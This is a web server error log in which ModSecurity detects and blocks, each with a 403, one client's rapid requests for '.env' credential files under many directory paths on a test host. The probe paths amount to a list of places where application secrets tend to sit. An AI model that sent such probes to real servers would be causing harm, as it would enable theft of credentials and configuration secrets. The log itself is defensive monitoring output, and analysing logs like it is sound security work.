[Fri Nov 28 10:26:24.806153 2025] [:error] [pid 381109] [client 54.67.124.117:53466] [client 54.67.124.117] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aSlqwOhaa_ABFroPvQ_ciAAAABY"]
[Fri Nov 28 10:26:24.806434 2025] [:error] [pid 381109] [client 54.67.124.117:53466] [client 54.67.124.117] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aSlqwOhaa_ABFroPvQ_ciAAAABY"]
[Fri Nov 28 10:26:24.806631 2025] [:error] [pid 381109] [client 54.67.124.117:53466] [client 54.67.124.117] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aSlqwOhaa_ABFroPvQ_ciAAAABY"]
[Fri Nov 28 10:26:25.276679 2025] [:error] [pid 383651] [client 54.67.124.117:53944] [client 54.67.124.117] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aSlqwaRsnuRo90KjPxVYNAAAAAI"]
[Fri Nov 28 10:26:25.278727 2025] [:error] [pid 383651] [client 54.67.124.117:53944] [client 54.67.124.117] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aSlqwaRsnuRo90KjPxVYNAAAAAI"]
[Fri Nov 28 10:26:25.278992 2025] [:error] [pid 383651] [client 54.67.124.117:53944] [client 54.67.124.117] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aSlqwaRsnuRo90KjPxVYNAAAAAI"]
[Fri Nov 28 10:26:25.556404 2025] [:error] [pid 383652] [client 54.67.124.117:54164] [client 54.67.124.117] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aSlqwa-aB9jQ3WSHqCMT1AAAAAQ"]
[Fri Nov 28 10:26:25.556674 2025] [:error] [pid 383652] [client 54.67.124.117:54164] [client 54.67.124.117] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aSlqwa-aB9jQ3WSHqCMT1AAAAAQ"]
[Fri Nov 28 10:26:25.556923 2025] [:error] [pid 383652] [client 54.67.124.117:54164] [client 54.67.124.117] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aSlqwa-aB9jQ3WSHqCMT1AAAAAQ"]
[Fri Nov 28 10:26:25.852598 2025] [:error] [pid 383654] [client 54.67.124.117:54460] [client 54.67.124.117] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSlqwahcqjiG8MxA3mSePQAAAAg"]
[Fri Nov 28 10:26:25.852928 2025] [:error] [pid 383654] [client 54.67.124.117:54460] [client 54.67.124.117] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSlqwahcqjiG8MxA3mSePQAAAAg"]
[Fri Nov 28 10:26:25.853154 2025] [:error] [pid 383654] [client 54.67.124.117:54460] [client 54.67.124.117] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSlqwahcqjiG8MxA3mSePQAAAAg"]
[Fri Nov 28 10:26:25.853986 2025] [:error] [pid 376662] [client 54.67.124.117:53560] [client 54.67.124.117] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /assets/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "aSlqwa9uJDTeYEJvuJMKGwAAAAU"]
[Fri Nov 28 10:26:25.854233 2025] [:error] [pid 376662] [client 54.67.124.117:53560] [client 54.67.124.117] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "aSlqwa9uJDTeYEJvuJMKGwAAAAU"]
[Fri Nov 28 10:26:25.854534 2025] [:error] [pid 376662] [client 54.67.124.117:53560] [client 54.67.124.117] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "aSlqwa9uJDTeYEJvuJMKGwAAAAU"]
[Fri Nov 28 10:26:26.288698 2025] [:error] [pid 383655] [client 54.67.124.117:54744] [client 54.67.124.117] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aSlqwgIi3HsSRP4ZSvqSvQAAAAo"]
[Fri Nov 28 10:26:26.289733 2025] [:error] [pid 383655] [client 54.67.124.117:54744] [client 54.67.124.117] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aSlqwgIi3HsSRP4ZSvqSvQAAAAo"]
[Fri Nov 28 10:26:26.290015 2025] [:error] [pid 383655] [client 54.67.124.117:54744] [client 54.67.124.117] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aSlqwgIi3HsSRP4ZSvqSvQAAAAo"]
[Fri Nov 28 10:26:26.684117 2025] [:error] [pid 383650] [client 54.67.124.117:53776] [client 54.67.124.117] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /database/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database/.env"] [unique_id "aSlqwsVfhQ6AWz1P1NuqLwAAAAA"]
[Fri Nov 28 10:26:26.684454 2025] [:error] [pid 383650] [client 54.67.124.117:53776] [client 54.67.124.117] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database/.env"] [unique_id "aSlqwsVfhQ6AWz1P1NuqLwAAAAA"]
[Fri Nov 28 10:26:26.684700 2025] [:error] [pid 383650] [client 54.67.124.117:53776] [client 54.67.124.117] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database/.env"] [unique_id "aSlqwsVfhQ6AWz1P1NuqLwAAAAA"]
[Fri Nov 28 10:26:27.401340 2025] [:error] [pid 381109] [client 54.67.124.117:53466] [client 54.67.124.117] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/app/.env"] [unique_id "aSlqw-haa_ABFroPvQ_ciQAAABY"]
[Fri Nov 28 10:26:27.401577 2025] [:error] [pid 381109] [client 54.67.124.117:53466] [client 54.67.124.117] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/app/.env"] [unique_id "aSlqw-haa_ABFroPvQ_ciQAAABY"]
[Fri Nov 28 10:26:27.401767 2025] [:error] [pid 381109] [client 54.67.124.117:53466] [client 54.67.124.117] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/app/.env"] [unique_id "aSlqw-haa_ABFroPvQ_ciQAAABY"]
[Fri Nov 28 10:26:27.872714 2025] [authz_core:error] [pid 376662] [client 54.67.124.117:53560] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env
[Fri Nov 28 10:26:28.244184 2025] [:error] [pid 383650] [client 54.67.124.117:53776] [client 54.67.124.117] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v1/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v1/.env"] [unique_id "aSlqxMVfhQ6AWz1P1NuqMQAAAAA"]
[Fri Nov 28 10:26:28.244405 2025] [:error] [pid 383650] [client 54.67.124.117:53776] [client 54.67.124.117] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v1/.env"] [unique_id "aSlqxMVfhQ6AWz1P1NuqMQAAAAA"]
[Fri Nov 28 10:26:28.244622 2025] [:error] [pid 383650] [client 54.67.124.117:53776] [client 54.67.124.117] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v1/.env"] [unique_id "aSlqxMVfhQ6AWz1P1NuqMQAAAAA"]
[Fri Nov 28 10:26:28.572246 2025] [:error] [pid 376662] [client 54.67.124.117:53560] [client 54.67.124.117] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /psnlink/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/psnlink/.env"] [unique_id "aSlqxK9uJDTeYEJvuJMKHQAAAAU"]
[Fri Nov 28 10:26:28.572458 2025] [:error] [pid 376662] [client 54.67.124.117:53560] [client 54.67.124.117] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/psnlink/.env"] [unique_id "aSlqxK9uJDTeYEJvuJMKHQAAAAU"]
[Fri Nov 28 10:26:28.572660 2025] [:error] [pid 376662] [client 54.67.124.117:53560] [client 54.67.124.117] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/psnlink/.env"] [unique_id "aSlqxK9uJDTeYEJvuJMKHQAAAAU"]
[Fri Nov 28 10:26:28.757484 2025] [:error] [pid 381109] [client 54.67.124.117:53466] [client 54.67.124.117] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v2/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v2/.env"] [unique_id "aSlqxOhaa_ABFroPvQ_cigAAABY"]
[Fri Nov 28 10:26:28.757811 2025] [:error] [pid 381109] [client 54.67.124.117:53466] [client 54.67.124.117] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v2/.env"] [unique_id "aSlqxOhaa_ABFroPvQ_cigAAABY"]
[Fri Nov 28 10:26:28.758080 2025] [:error] [pid 381109] [client 54.67.124.117:53466] [client 54.67.124.117] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v2/.env"] [unique_id "aSlqxOhaa_ABFroPvQ_cigAAABY"]
[Fri Nov 28 10:26:29.298889 2025] [:error] [pid 376662] [client 54.67.124.117:53560] [client 54.67.124.117] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /exapi/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/exapi/.env"] [unique_id "aSlqxa9uJDTeYEJvuJMKHgAAAAU"]
[Fri Nov 28 10:26:29.299209 2025] [:error] [pid 376662] [client 54.67.124.117:53560] [client 54.67.124.117] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/exapi/.env"] [unique_id "aSlqxa9uJDTeYEJvuJMKHgAAAAU"]
[Fri Nov 28 10:26:29.299482 2025] [:error] [pid 376662] [client 54.67.124.117:53560] [client 54.67.124.117] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/exapi/.env"] [unique_id "aSlqxa9uJDTeYEJvuJMKHgAAAAU"]
[Fri Nov 28 10:26:29.301161 2025] [:error] [pid 383650] [client 54.67.124.117:53776] [client 54.67.124.117] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aSlqxcVfhQ6AWz1P1NuqMgAAAAA"]
[Fri Nov 28 10:26:29.301431 2025] [:error] [pid 383650] [client 54.67.124.117:53776] [client 54.67.124.117] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aSlqxcVfhQ6AWz1P1NuqMgAAAAA"]
[Fri Nov 28 10:26:29.301648 2025] [:error] [pid 383650] [client 54.67.124.117:53776] [client 54.67.124.117] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aSlqxcVfhQ6AWz1P1NuqMgAAAAA"]
[Fri Nov 28 10:26:29.741408 2025] [:error] [pid 381109] [client 54.67.124.117:53466] [client 54.67.124.117] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /uploads/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/uploads/.env"] [unique_id "aSlqxehaa_ABFroPvQ_ciwAAABY"]
